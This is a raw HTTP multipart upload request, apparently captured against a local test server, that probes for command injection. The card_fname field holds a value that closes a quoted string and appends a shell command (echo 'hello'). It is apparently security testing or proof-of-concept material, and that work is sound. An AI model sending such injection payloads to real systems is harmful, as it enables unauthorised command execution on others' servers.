POST /use.html HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 417
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryhELuMOqZuZ53tBEA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8000/use.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: sessionid=02n77lgbw4aeskoax8y45322tbf3jx2j
Connection: close

------WebKitFormBoundaryhELuMOqZuZ53tBEA
Content-Disposition: form-data; name="card_data"; filename="four.txt"
Content-Type: text/plain

texet
------WebKitFormBoundaryhELuMOqZuZ53tBEA
Content-Disposition: form-data; name="card_supplied"

False
------WebKitFormBoundaryhELuMOqZuZ53tBEA
Content-Disposition: form-data; name="card_fname"

dd""; echo 'hello';
------WebKitFormBoundaryhELuMOqZuZ53tBEA--
